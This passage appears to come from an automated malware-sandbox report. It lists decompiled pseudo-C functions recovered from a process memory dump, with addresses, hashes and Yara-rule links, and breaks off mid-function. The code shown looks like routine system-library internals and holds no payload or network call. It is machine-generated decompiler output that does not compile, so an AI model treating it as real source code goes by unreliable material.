Uniqueness Score: -1.00%

Function 010B070D, Relevance: .1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E010B070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E010B07DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E010AAFDE( &_v8,  &_v12);
					E010B1293(_t38, _v28, _t60);
					if(E01007D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E010A14FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}

0x010b071b
0x010b0724
0x010b0734
0x010b0738
0x010b074b
0x010b074b
0x010b0753
0x010b0753
0x010b0759
0x010b075d
0x010b0774
0x010b0779
0x010b077d
0x010b0789
0x010b0795
0x010b07a7
0x010b0797
0x010b07a0
0x010b07a0
0x010b07af
0x010b07c4
0x010b07cd
0x010b07cd
0x010b07af
0x010b07dc

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction ID: b636d883c551bfa3d3036919248cc5278e02df690852c22d02919cb16ec9665b
Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction Fuzzy Hash: BB21FF76704200AFD705DF68C884AABBBE5FFD4750F048669F9958B389DB30D909CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01067794, Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E01067794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x10d7b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L01004620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E0102F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E01007D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E01029AE0();
					_t24 = L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}

0x01067799
0x0106779a
0x0106779b
0x010677a3
0x010677ab
0x010677ae
0x010677b1
0x010677b1
0x010677bf
0x010677c4
0x010677c8
0x010677ce
0x010677d4
0x010677e0
0x010677e0
0x010677d6
0x010677d6
0x010677de
0x00000000
0x00000000
0x010677de
0x010677e5
0x010677f0
0x010677f3
0x010677f6
0x010677fd
0x01067800
0x0106780c
0x01067818
0x0106782b
0x0106781a
0x01067823
0x01067823
0x01067830
0x01067831
0x01067838
0x0106783d
0x0106783e
0x0106784f
0x0106784f
0x0106785a

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0539f188a4fb66c24bb996c091e113ff1d0aa26630211167aa47be3db90710b6
Instruction ID: d62a794729ef00dfaf1ebb5a92652d4492924271de0cb5fa911aefc0f39e46f7
Opcode Fuzzy Hash: 0539f188a4fb66c24bb996c091e113ff1d0aa26630211167aa47be3db90710b6
Instruction Fuzzy Hash: B6219F72500604AFD725DF69D880EABBBBCEF48740F104569EA4AC7650D634E900CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0100AE73, Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0100AE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E01007D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E01007D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E01007D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E01007D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E01067794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}

0x0100ae78
0x0100ae7c
0x0100ae7e
0x0100ae81
0x0100ae86
0x0100ae8d
0x01052691
0x0100ae93
0x0100ae93
0x0100ae93
0x0100ae98
0x0100ae9d
0x010526a2
0x010526b4
0x010526a4
0x010526ad
0x010526ad
0x010526b9
0x00000000
0x010526bb
0x00000000
0x010526bb
0x0100aea3
0x0100aea3
0x0100aea3
0x0100aeaa
0x010526c0
0x010526c9
0x010526c9
0x0100aeb3
0x010526d4
0x010526e1
0x00000000
0x00000000
0x010526e7
0x010526ee
0x010526f0
0x010526f9
0x010526f9
0x01052702
0x01052708
0x01052708
0x0105270b
0x0105270f
0x01052711
0x01052711
0x01052725
0x01052725
0x00000000
0x0100aeb9
0x0100aeb9
0x0100aebf
0x0100aebf
0x0100aeb3

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction ID: 4ef80d57108e4ec72e7d1a7af3823c3143c1399db0550cac33af402280f64972
Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction Fuzzy Hash: 63219F72601685DFE7679B69C944B667BE8AF48750F1900E1DE848B6A2E738DC40C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 0101FD9B, Relevance: .1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0101FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E00FF76E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L01004620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}

0x0101fd9b
0x0101fda0
0x0101fda1
0x0101fdab
0x0101fdad
0x0101fdb0
0x0101fdb8
0x0101fe0f
0x0101fde6
0x0101fde9
0x0101fdec
0x0105c0c0
0x0101fdfe
0x0101fe06
0x0101fe06
0x0105c0c8
0x0101fe2d
0x0101fe2d
0x00000000
0x0101fe2d
0x0105c0d1
0x0105c0e0
0x0105c0e5
0x0105c0e5
0x0105c0e8
0x00000000
0x0105c0e8
0x0101fdf4
0x00000000
0x00000000
0x0101fdf6
0x0101fdfa
0x0101fe1a
0x0101fe1f
0x0101fe1f
0x0101fdfc
0x00000000
0x0101fdfc
0x0101fdcc
0x0101fdd0
0x0101fe26
0x00000000
0x0101fe26
0x0101fdd8
0x0101fddb
0x0101fddd
0x0101fde0
0x00000000

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction ID: c78e7c784520d09c61686d49bfc9c96f570e1389658c8cce700a086e2e7ec0d0
Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction Fuzzy Hash: F421AC72600A42DBD731DF0DC640A66F7E9EB94B10F2080BEE98A87619D738AC05CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0101B390, Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0101B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E01002280(_t12, 0x10d8608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E010200C2(0x10d8608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}

0x0101b395
0x0101b3a2
0x0101b3a5
0x0101b3aa
0x0101b3b2
0x0101b3ba
0x0101b3bd
0x0101b3c0
0x0101b3c4
0x0101b3c9
0x0105a3e9
0x0105a3ed
0x0105a3f0
0x0105a3ff
0x0105a403
0x0105a409
0x00000000
0x00000000
0x0105a40b
0x0105a40b
0x0105a40f
0x0105a415
0x0105a423
0x0105a423
0x0105a415
0x0101b3d1
0x0101b3e8
0x0101b3e8
0x0101b3d9

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2fbe8356e742b113e024eb89a9628c4f1da6ed42a76232153342e95ebc98d81
Instruction ID: 3ff78acabe799d09f763d7d7de7fb86158af8b51dadbd6d740b5a9cf40016207
Opcode Fuzzy Hash: b2fbe8356e742b113e024eb89a9628c4f1da6ed42a76232153342e95ebc98d81
Instruction Fuzzy Hash: 8B116F333012109BCB199A59CD8156F77A6FBC9730F24817AED96D7380DE355C01C690

Uniqueness

Uniqueness Score: -1.00%

Function 00FE9240, Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00FE9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x10bf708);
				E0103D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E010295D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E010295D0();
				_t33 =  *0x10d84c4; // 0x0
				L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x10d84c4; // 0x0
				L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x10d84c4; // 0x0
				E01002280(L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x10d86b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E010295D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E010295D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E00FE9325();
					_t50 =  *0x10d84c4; // 0x0
					return E0103D0D1(L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}

0x00fe9240
0x00fe9242
0x00fe9247
0x00fe924c
0x00fe924e
0x00fe9255
0x00fe9257
0x00fe925a
0x00fe925f
0x00fe925f
0x00fe9266
0x00fe9271
0x00fe9276
0x00fe9279
0x00fe927e
0x00fe9295
0x00fe929a
0x00fe92b1
0x00fe92b6
0x00fe92d7
0x00fe92dc
0x00fe92e0
0x00fe92e6
0x00fe92e8
0x00fe92ee
0x00fe9332
0x00fe9333
0x00fe9337
0x00fe9338
0x00fe933a
0x00fe933a
0x00fe933d
0x00fe9342
0x00fe9342
0x00fe9345
0x00fe9349
0x00fe934e
0x00fe9352
0x00fe9357
0x00fe92f4
0x00fe92f4
0x00fe92f6
0x00fe92f9
0x00fe9300
0x00fe9306
0x00fe9324
0x00fe9324

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3c589672897b4aa137f7d116fbb58d75c94723b6db86fb7cfeb549ba9ca9d37d
Instruction ID: 604bb5b1ba04f83b4333cfe74abdd887f4655444c93407867ec7de39911d599a
Opcode Fuzzy Hash: 3c589672897b4aa137f7d116fbb58d75c94723b6db86fb7cfeb549ba9ca9d37d
Instruction Fuzzy Hash: 89218731042641EFC722EF68CA00F9AB7B9FF18704F00856CE089876A2CB39E941DB50

Uniqueness

Uniqueness Score: -1.00%

Function 01074257, Relevance: .1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E01074257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x10c08d0);
				E0103D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E010741E8(__ebx, __edi, __ecx, _t39);
				E00FFEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x10d87e4;
					_t18 =  *0x10d87e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x10d5cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x10d87e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x10d87e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L00FE7055(_t31 + 0xfffffff8);
								_t24 =  *0x10d87e0; // 0x0
								_t18 = _t24 - 1;
								 *0x10d87e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x10d5cd0;
				if( *0x10d5cd0 <= 0) {
					L00FE7055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x10d87e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x10d87e8 = _t30;
						 *0x10d87e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E0103D0D1(L01074320());
			}

0x01074257
0x01074257
0x01074257
0x01074259
0x0107425e
0x01074263
0x01074265
0x01074273
0x01074278
0x0107427c
0x0107427f
0x01074281
0x01074287
0x010742d7
0x010742d7
0x010742da
0x0107428d
0x0107428d
0x0107428f
0x01074292
0x01074297
0x0107429c
0x010742a0
0x010742a6
0x010742a8
0x010742ae
0x010742b3
0x00000000
0x010742ba
0x010742ba
0x010742bf
0x010742c5
0x010742ca
0x010742cf
0x010742d0
0x00000000
0x010742d0
0x010742b3
0x00000000
0x010742a6
0x0107429c
0x010742dc
0x010742dc
0x010742e3
0x01074309
0x010742e5
0x010742e5
0x010742e8
0x010742ee
0x010742f0
0x00000000
0x010742f2
0x010742f2
0x010742f4
0x010742f7
0x010742f9
0x01074300
0x01074300
0x010742f0
0x0107430e
0x0107431f

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36177b903547419725b6a7b84581be941c2d35a5a36ae7c85f8b0a97ffbe22a5
Instruction ID: 3ec169276111e9a6c6b503b38731ef256b200fd69b778d900da84a35b28168de
Opcode Fuzzy Hash: 36177b903547419725b6a7b84581be941c2d35a5a36ae7c85f8b0a97ffbe22a5
Instruction Fuzzy Hash: A9214C70A02602CFC766EF68D400A54B7F1FB85315B51C2AAE599CB265D73AD462CF44

Uniqueness

Uniqueness Score: -1.00%

Function 01012397, Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E01012397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x10d848c != 0) {
					L0100FAD0(0x10d8610);
					if( *0x10d848c == 0) {
						E0100FA00(0x10d8610, _t19, _t27, 0x10d8610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E01012581(0x10d8610, 0xfc50a0, _t26, _t27, _t28);
						E0100FA00(0x10d8610, 0xfc50a0, _t27, 0x10d8610);
					}
				} else {
					L1:
					_t11 =  *0x10d8614; // 0x0
					if(_t11 == 0) {
						_t11 = E01024886(0xfc1088, 1, 0x10d8614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E01012581(0x10d8610, (_t11 << 4) + 0xfc5070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}

0x010123b0
0x010123b6
0x01012409
0x01012415
0x01055ae9
0x00000000
0x0101241b
0x0101241b
0x0101241d
0x01012427
0x0101242e
0x01012430
0x01012430
0x010123b8
0x010123b8
0x010123b8
0x010123bf
0x010123fc
0x010123fc
0x010123c1
0x010123c3
0x010123d0
0x010123d8
0x010123d8
0x010123dc
0x010123de
0x010123e1
0x010123e1
0x010123ec

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e03e2a9314a4c9668e1886c299425a2d56d1e752f09454bdbb7a54b3f5fc43b
Instruction ID: b04b375a428b981439a43c134b7db7ae7fb02dc6a7bdef38a5dbac80d93fe1f0
Opcode Fuzzy Hash: 7e03e2a9314a4c9668e1886c299425a2d56d1e752f09454bdbb7a54b3f5fc43b
Instruction Fuzzy Hash: 77114E7174030267E331962D9D84F59B6DCFB60720F24C06BFAC2D7185C9B8E8419754

Uniqueness

Uniqueness Score: -1.00%

Function 010646A7, Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E010646A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L01004620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E0102F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E0101D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L010077F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}

0x010646b7
0x010646ba
0x010646c5
0x010646c8
0x010646d0
0x010646d4
0x010646e6
0x010646e9
0x010646f4
0x010646ff
0x01064705
0x01064706
0x0106470c
0x01064713
0x0106471b
0x01064723
0x01064725
0x010646d6
0x010646d9
0x010646db
0x010646db
0x01064732

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction ID: 47abb996bd60fb67fec9f0a84fe619602f99f28f3369532805a3259aa419c33d
Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction Fuzzy Hash: 32112572504208BBC7029F5CD8808BEB7B9EF99300F1080AAF984C7351DA359D51C3A5

Uniqueness

Uniqueness Score: -1.00%

Function 00FEC962, Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E00FEC962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				char _t22;
				void* _t26;
				void* _t27;
				char _t32;
				char _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x10dd360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E00FFEEF0(0x10d70a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E0106F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E00FFEB70(_t29, 0x10d70a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E0102B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E0106F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x10d70c0; // 0x0
					while(_t38 != 0x10d70c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x10db1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}

0x00fec96a
0x00fec974
0x00fec988
0x00fec98a
0x01057c9d
0x01057c9f
0x01057ca4
0x01057cae
0x01057cf0
0x01057cf5
0x01057cfa
0x00fec992
0x00fec996
0x00fec997
0x00fec998
0x00fec9a3
0x00fec9a3
0x01057cb0
0x01057cb7
0x01057cbb
0x00000000
0x00000000
0x01057cbd
0x01057ce8
0x01057cc5
0x01057cc8
0x01057cca
0x01057cd0
0x01057cd6
0x01057cde
0x01057ce4
0x01057ce4
0x01057cd0
0x00000000
0x01057ce8
0x00fec990
0x00000000

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f8701a280334620f2d612bb3b5d5f5354d105be83aa41bd6e66e0818304e2d3
Instruction ID: e73e66ffaf19b6213a7549152b0cf201405a60776d3a9569349f71995f99464f
Opcode Fuzzy Hash: 6f8701a280334620f2d612bb3b5d5f5354d105be83aa41bd6e66e0818304e2d3
Instruction Fuzzy Hash: 6E11C23130074A9BC7A1AE2DDC45A6B7FE6BB84614B80052CFDC5876A1DB25EC10E7D1

Uniqueness

Uniqueness Score: -1.00%

Function 010237F5, Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E010237F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
